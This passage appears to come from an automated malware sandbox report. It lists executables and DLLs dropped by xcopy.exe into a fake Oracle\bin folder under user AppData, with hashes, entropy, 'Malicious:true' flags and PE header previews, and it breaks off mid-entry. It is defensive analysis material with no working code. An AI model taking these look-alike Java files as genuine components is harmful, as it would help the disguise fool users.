                                                                                                                                                                                                                                  SHA-512:4BAFB61E8618C1506EA6128EF2FBCFEF3F08112B7B134CE4CDB8F216F12D29826A4B96B11A71075A37DA9A9C39A6CFB2AD107C64C43ABFCEBB5148CDC7F87AA1
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a!..r..r..r..r..r...s..r...s..r..r..r...r..r...s..r...s..r...s..r_..s..r_..s..r_..r..r_..s..rRich..r................PE..L...{.d...........!................w........0...............................p.......O....@..........................7..`....8.......P...............2...(...`......X3..T............................2..@............0...............................text...1........................... ..`.rdata.......0......................@..@.data........@.......*..............@....rsrc........P.......,..............@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.851451007592065
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Csb50+PJRlOjc5LknKq82PrefmOVIYi1oqLPxh8E9VF0NygQQlMI:Csb50+PfzE8sqfmdYi9PxWEaFN
                                                                                                                                                                                                                                  MD5:05F93CA69FD70753C11E4B394A593783
                                                                                                                                                                                                                                  SHA1:A7E57D66E11A2423B21B1DECC1A97501586407A8
                                                                                                                                                                                                                                  SHA-256:C4589E723B0FAE05705E4B3E7A8CC446F200DB10EF3A85B7F6E6F265222FFB53
                                                                                                                                                                                                                                  SHA-512:7C166CC6FCBBAA04DF1B22F09E73F18E279D68AE24C982BB7BA1A6D463C79A5E46C62E0B61337854D7C6D94312BC271A6198C76374D4C8EDCBE0EAB95503D0F7
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................`......x.....@.................................D'.......@..P............0...(...P...... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.822940211571471
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:UcNWbe0J4rLJaVjtFzq82Dhef5O2IYi1o1Pxh8E9VF0NyaSDEe:UcNWbe0C8EIf50YiYPxWEgSl
                                                                                                                                                                                                                                  MD5:96C7313D215EB1A7435E2B3ED160FFAC
                                                                                                                                                                                                                                  SHA1:A56F5387236537F76601B32A1BB86EA32A0B4BF7
                                                                                                                                                                                                                                  SHA-256:888FC867E3EE6DAD27FC795AA47544667174C235506ED67D1D99AFABF6DAC272
                                                                                                                                                                                                                                  SHA-512:FC89A3A186B50F318C627A378452A65CC1A1C82B5F6FD8869A6EAEE16BBFD103C2571A757483458E1738A7872F38BCDA27A3E66E7EDC8C10B08466511443C2BC
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................`......E.....@..................................&.......@..\............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcp140.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):439208
                                                                                                                                                                                                                                  Entropy (8bit):6.6510194969003855
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:IdyX+9Tk5fb+5J56HgGwKz2zRThUgiW6QR7t5s03Ooc8dHkC2es+Fpyd:LX+9TkR+5J56AjKz2VA03Ooc8dHkC2eu
                                                                                                                                                                                                                                  MD5:FDD04DBBCF321EEE5F4DD67266F476B0
                                                                                                                                                                                                                                  SHA1:65FFDFE2664A29A41FCF5039229CCECAD5B825B9
                                                                                                                                                                                                                                  SHA-256:21570BCB7A77E856F3113235D2B05B2B328D4BB71B4FD9CA4D46D99ADAC80794
                                                                                                                                                                                                                                  SHA-512:04CFC3097FBCE6EE1B7BAC7BD63C3CFFE7DCA16F0EC9CD8FE657D8B7EBD06DCBA272FF472F98C6385C3CFB9B1AC3F47BE8CA6D3EA80AB4AEED44A0E2CE3185DD
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P..%.d.v.d.v.d.v...w.d.v..~v.d.v.d.v.d.vv..w.d.vv..w.d.vv..w.d.vv..w.d.vv..w.d.vv..v.d.vv..w.d.vRich.d.v................PE..L..."............."!.........~...............0......................................h.....@A.........................\......Hc...........................'......$7..hX..T............................W..@............`..@............................text............................... ..`.data...L(...0....... ..............@....idata.......`.......8..............@..@.rsrc................P..............@..@.reloc..$7.......8...T..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):265856
                                                                                                                                                                                                                                  Entropy (8bit):5.538534369903799
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:hTnPxwb+6T2csJUcODMM4cBqg8UyJNjuGZzfYtRD+E3ABjqDPQf7rhsxfNq:hTnPxwb+6T26bq
                                                                                                                                                                                                                                  MD5:787D5A56940EACF564ED6D6800D22C5C
                                                                                                                                                                                                                                  SHA1:66A882F7868C1D541BE9007805F828070C6627DC
                                                                                                                                                                                                                                  SHA-256:311DDCF7931721978751451446CA6CFBC97E5E65D21CD75999345BF63A0686B2
                                                                                                                                                                                                                                  SHA-512:F9FB7CA613E0B3D16CFE492861597CB295F4F67E0F7884F7ED17CC551A0945A479FB1541D0590D44DDE947C3D320421AF2CFEC402AD39829025BB7DE27B9800E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2..@2...2...3...2...2...2...3...2...3...2..3...2...2...2...3...2...3...2...3...2...3...2..,2...2...3...2Rich...2........................PE..L...S.d...........!.....4...................P............................... ............@..........................0..D...$@..T........h...............(..............T...................@...........@............P......X-.......................text....2.......4.................. ..`.rdata.......P.......8..............@..@.data....!...`.......F..............@....rsrc....h.......j...b..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\vcruntime140.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):79792
                                                                                                                                                                                                                                  Entropy (8bit):6.778166830217706
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:5UwZIDobDaHrrAPsCbU4qzBHXpHo0ecbGp9yBOBDozi:7ZPDaHrrobUHzDxecbG3yGo
                                                                                                                                                                                                                                  MD5:BA65DB6BFEF78A96AEE7E29F1449BF8A
                                                                                                                                                                                                                                  SHA1:06C7BEB9FD1F33051B0E77087350903C652F4B77
                                                                                                                                                                                                                                  SHA-256:141690572594DBD3618A4984712E9E36FC09C9906BB845CE1A9531AC8F7AD493
                                                                                                                                                                                                                                  SHA-512:CA63EEAC10EF55D7E2E55479B25CF394E58AEF1422951F361F762AB667F72A3454F55AFC04E967E8CDD20CF3EEBE97083E0438EA941916A09E7D091818EA830E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........M...M...M.....O...D...F...M...d.../..Y.../..X.../..Q.../..L.../.u.L.../..L...RichM...........PE..L................."!.........................................................P......./....@A........................P........ .......0...................'...@......x$..T............................#..@............ ...............................text...d........................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.824705885017542
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:ls1ubekJ4rLJa9jDwdq82NDef/OcYIYi1oZPxh8E9VF0NyyCOsdQ:ls1ubekJ8Wif/nBYiKPxWEMHs6
                                                                                                                                                                                                                                  MD5:6EF015EA8BDC66FFD2899FC298E5F10B
                                                                                                                                                                                                                                  SHA1:713C5EDCF935E0AFAFBF3B428B7441DC779D155E
                                                                                                                                                                                                                                  SHA-256:1EBF20CE4DA7FBEB669A102E7C0F5275903345DF1289177FBA5A434753C46A4F
                                                                                                                                                                                                                                  SHA-512:2C533BB242A97B7BFDAE93C61C651A495B65B82A6FE4950C2BDCBBE8172D354A6634E1EA87DD187AB3A7CE72301EA34EDFAC4B7361FE66E53350EA314165852B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................`...........@..................................&.......@..p............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60032
                                                                                                                                                                                                                                  Entropy (8bit):6.564305600613777
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:8EBICaKKwKolIu+RseFWsliAoEvbpGrYPyDfe1OlU8qODwmYi/PxWEtE:8OIOKK+R5himlQx2Kwm7/PxA
                                                                                                                                                                                                                                  MD5:0485D3658BFA35F13618DC9266330B5A
                                                                                                                                                                                                                                  SHA1:D919DC39B760B49CF9634EDBE7819C5939B08CCA
                                                                                                                                                                                                                                  SHA-256:9D49D5AD3789F20ED950851DC5B5C98E6B977E1C391B31DEBCC19EAEDB60C1A7
                                                                                                                                                                                                                                  SHA-512:47B9E0FE67B11AB55D73228332DA1911DCEF94A6F3536870F80FCAE1CC3DA767669D43FE017F3A5B721EAE79D934885FADCF316E8F23A5D5781FD0EB36DBF6E4
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a..%...%...%...,.f.#...G...'...1...&...%.......G..)...G../...G...'......".......$.......$.......$...Rich%...................PE..L......d...........!................[.....................................................@.............................0.......x........................(..........(...............................h...@............................................text...?........................... ..`.rdata.. ...........................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):122496
                                                                                                                                                                                                                                  Entropy (8bit):5.869812804751989
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:kRS14g/TFZdJI3dTdbd7YTwdRdNdg7j++1+1+PtW1+g+z+rfSoCxCVCEiJLC7Czp:gS14fh6D
                                                                                                                                                                                                                                  MD5:6082089B6FB3B3C6ACE2A19C0A0BF8C7
                                                                                                                                                                                                                                  SHA1:AB795F6342280BDB8AB387A30C46B7653479FF7F
                                                                                                                                                                                                                                  SHA-256:899AB6BE6100A1A1E5C23C7348C8AF4F1FF974C7D124EA3D1E253DF0835037DA
                                                                                                                                                                                                                                  SHA-512:6FE28EF63D7163561CE9029D61AD205DA19C360C17484A3FC44D9E9E36E10CAEB379A8625F653B4F6400A0ABF06AE1D69F9174E9F23585F1613F579A1839903A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........fw...$...$...$..$...$...%...$...%...$...%...$...%...$...%...$...$..$+..%...$+..%...$+..$...$+..%...$Rich...$........................PE..L......d...........!........."......................................................Z.....@.............................L...\............................(......(......................................@...............4............................text.............................. ..`.rdata..Z...........................@..@.data...............................@....rsrc...............................@..@.reloc..(...........................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):56448
                                                                                                                                                                                                                                  Entropy (8bit):6.743227926837006
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:nryFyMib1eqds2/0f0wRYl+mbCTQ785Pxj:mFyMib1eqd/0ZYl+mbCTQ+xj
                                                                                                                                                                                                                                  MD5:53723DA917E21F52990800B3836D7BA3
                                                                                                                                                                                                                                  SHA1:DCF027AF711C4B97E50C7C01200243B84BED882C
                                                                                                                                                                                                                                  SHA-256:E512356F941BB98DD2F0243AA58072F1B8FF47A91E05B5997507D7F80BE569F8
                                                                                                                                                                                                                                  SHA-512:7436E479658B8356C0554D41AC0B93065662C77514D59B13396A9AE464A770F09A8A66492B1BBB27433AFB8A1632AFAE3FACF8B14D24CD676A7681D3153B8D47
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@..w.].w.].w.]...].w.]../\.w.]../\.w.].w/].w.]..+\.w.]..*\.w.]..-\.w.]E.*\.w.]E..\.w.]E..].w.]E.,\.w.]Rich.w.]........PE..L......d...........!.....................................................................@.............................D......x........................(......x..................................0...@............................................text............................... ..`.rdata..............................@..@.data...T...........................@....rsrc...............................@..@.reloc..x...........................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21632
                                                                                                                                                                                                                                  Entropy (8bit):6.6443481132912225
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:8dDvhGmJh7bEjSndftIYi1orPxh8E9VF0NyTF91:8dkmr7Tf6Yi4PxWE9h
                                                                                                                                                                                                                                  MD5:F203A8BCB40651B0191E57B2EBCBA11C
                                                                                                                                                                                                                                  SHA1:F543AB009F432409DAF0B5B45DFB1BCAE38A1BEE
                                                                                                                                                                                                                                  SHA-256:AE15C9B59E20F66A5089543EE2D6458ADBE432A9A53D7555BE91794478F783F7
                                                                                                                                                                                                                                  SHA-512:C8FB2984A96E88BB828D7F194CDF525EBD073C3E9BD5C0CB26B1040427A61D17A518B47D9B66255775028662F64056980F5D22429606C737C12B76449FF09A51
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........G...&...&...&...^...&...^...&...M...&...^...&...^...&...^...&..m_...&...&...&..m_...&..m_...&..m_l..&..m_...&..Rich.&..................PE..L.....d...........!......................... ...............................`............@..........................%.......*..x....@...............,...(...P..d....!..T............................ ..@............ ..x............................text...k........................... ..`.rdata....... ......................@..@.data........0.......$..............@....rsrc........@.......&..............@..@.reloc..d....P.......*..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.822709813424062
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:3sF+beUJ4rLJaNjAQyq82FBXefmOevIYi1oehRPxh8E9VF0NyRvTHh:3sF+beUL8e4fmPQYi7vPxWEPrh
                                                                                                                                                                                                                                  MD5:7B80F51FB73A7EEA2DEF132141C2F899
                                                                                                                                                                                                                                  SHA1:2516C5E38EF955A9703CE67FF588E4D0242F52C9
                                                                                                                                                                                                                                  SHA-256:D9FF32A5C700BC2FA7E1B48F45CAAA190801469E730FDE73BBA287B2F7CD0138
                                                                                                                                                                                                                                  SHA-512:B65F514C6B619D43D7E97D8A8B79B13528D19C181FDB1041F7B6F3926904B5A35227A73B1DF99CD1E8A0AB7E083DA5BB1E17920A7D3AE5C5A1DB5C741B190047
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................`............@..................................&.......@..P............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.820784213431929
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:ZM1ubeUJ4rLJapjSadq82nDefSOOIYi1o7Pxh8E9VF0Ny05O7:ZM1ubeUu84ifSsYioPxWEOI7
                                                                                                                                                                                                                                  MD5:0EC73DC06A94C8B37C8C84D4EF2CB661
                                                                                                                                                                                                                                  SHA1:FAE91CA02A2A1A0D09BEC2651720D76CDDB40393
                                                                                                                                                                                                                                  SHA-256:E0CC96E56C911B240E8A0BF70D96B936E0FAF094D936696ECF7E88273E9A8489
                                                                                                                                                                                                                                  SHA-512:743CA538C2FE17C51109B1BAD95D718012A400BF8A50DED598B6E7BA2EA1AC411C7F0158D75214059DE8E286BBE9B811514A3D90FFE8CA6CBF9797E043DE2017
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................`............@..................................&.......@..p............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.8249091826776
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Is1ubekJ4rLJa9jxh9dq82m7Xef/OuIYi1o6KPxh8E9VF0Ny8GH:Is1ubekBA8Nif/cYivKPxWECc
                                                                                                                                                                                                                                  MD5:14D5480380A89961D603EE29C1DF959C
                                                                                                                                                                                                                                  SHA1:E8AAA190A69107DCB033CAB8A9A35CC845EF1F76
                                                                                                                                                                                                                                  SHA-256:45D2406D17179C8103C528ED91627B32F4FDDD2E69E864119FC05E0CDBA244A0
                                                                                                                                                                                                                                  SHA-512:1BE14151833AEA6A27E5D89A9B2F3000E1647539593444F663901832334CD3107CBF83A32FE52C54ED6AA8E13ACA696BAA10248242EBE15946C9606CDE984C77
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................`............@..................................&.......@..p............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):191104
                                                                                                                                                                                                                                  Entropy (8bit):6.9146371702489935
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:QdIhc3//Kimcp5MBhHOdlaWbsMp7jkX5E1OBCD5ZQxuZYW4rJupGtvfarOpeCxj:QD//Hmcv12WWJEWClZQxuZuupGtvfary
                                                                                                                                                                                                                                  MD5:01A0729BD7CC0FB9F7C5B94818F8FBA3
                                                                                                                                                                                                                                  SHA1:E6316BEF34A6011ECB6D227560831E4B846C6027
                                                                                                                                                                                                                                  SHA-256:904E922D5FD221DF176FF381D62E7FBAB76B525DBA945A83E02D2A5E3398992F
                                                                                                                                                                                                                                  SHA-512:28ADDAD92726DACE0F21DA0CDB69C9B7EAB4318258CF46470B3F7F0CB086FB6117984AB72EAC37F418C146E00EF1290D7CC59C20E7A929D076CBCF46A30B579A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l1?J._lJ._lJ._lCu.lZ._l(u^mH._l(u.lL._l(u[m@._l(u\mL._l(uZmE._l^f^mO._lJ.^l.._l.t[m.._l.t_mK._l.t.lK._l.t]mK._lRichJ._l........................PE..L...}.d...........!......................... ...............................0............@............................................................(... ......@...T...............................@............ ..T...D...`....................text............................... ..`.rdata..".... ......................@..@.data....1..........................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\sspi_bridge.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):38528
                                                                                                                                                                                                                                  Entropy (8bit):6.723133196876965
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:3eVqDLd26iDkjSy1ieATp9HUibrdSA52bQjY2/9N2tZvNNJljJjYRebGbmTLIYiV:3eVpadATpRrfNaj7bGbq0YiuLPxWETwJ
                                                                                                                                                                                                                                  MD5:05A5A77A1591896A31C3B8B62C4023FD
                                                                                                                                                                                                                                  SHA1:53E50BD6E86FFF5482B2681BEF39C96642C534FC
                                                                                                                                                                                                                                  SHA-256:48EEF73B02B6752E20512BD96A749A95731F6171D75EBF73E072429A224A37E8
                                                                                                                                                                                                                                  SHA-512:3DA3DC454EE4158FE5C79848A4BE7D83ED66393DA1ADC13806121BF6A16FF8C948A468EE6BCF44C4296B1920BE6C3121D6D0E8D5BBFFAB554AB2CAC5A6D140C3
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J...............l.....l.....l.............F.l...................~.........Rich..........................PE..L...|.d...........!.....<...2.......@.......P...........................................@..........................f..`...`i.......................n...(..........._..T...........................H^..@............P.. ............................text....:.......<.................. ..`.rdata...!...P..."...@..............@..@.data...4............b..............@....rsrc................d..............@..@.reloc...............h..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):628864
                                                                                                                                                                                                                                  Entropy (8bit):5.540451385394713
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:SGbiFJ4jiRK7zsFV4cQ/y0rCsdmipG1XggDRR667++4R+T6s44xv9uXb9f:aqiR3P4cQ/y0rCssipG1NUIT+Xb9f
                                                                                                                                                                                                                                  MD5:9D6942B66233475FA5846201AFD76C87
                                                                                                                                                                                                                                  SHA1:C104089CEDF0DD35024ECFD6C789BE70AA5AFE9C
                                                                                                                                                                                                                                  SHA-256:838EC483DA8947D66FEECD9FBF69E4231A12AD0CBFA1EEC6B31024194D45CA7E
                                                                                                                                                                                                                                  SHA-512:FCCECE115167F2F9E03DB8993FCA56FFFA9CDCF0893FF12F9B73619DE9A2794A47FAD895164992397F6CC301E916B638E792F9C5B9FCAB9F3D44AAD02E62F248
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........c.k.0.k.0.k.0...1.k.0...1Dk.0..^0.k.0...1.k.0...1.k.0...1.k.0...1.k.0.k.0.j.0...1.k.0...1.k.0...1.k.0..\0.k.0...1.k.0Rich.k.0................PE..L...C.d...........!.....,...L......!........@............................................@..............................................s...........p...(...`...=...;..T............................:..@............@......T........................text....+.......,.................. ..`.rdata..Rj...@...l...0..............@..@.data....-......."..................@....rsrc....s.......t..................@..@.reloc...=...`...>...2..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):85632
                                                                                                                                                                                                                                  Entropy (8bit):5.957156263176118
                                                                                                                                                                                                                                  Encrypted:false
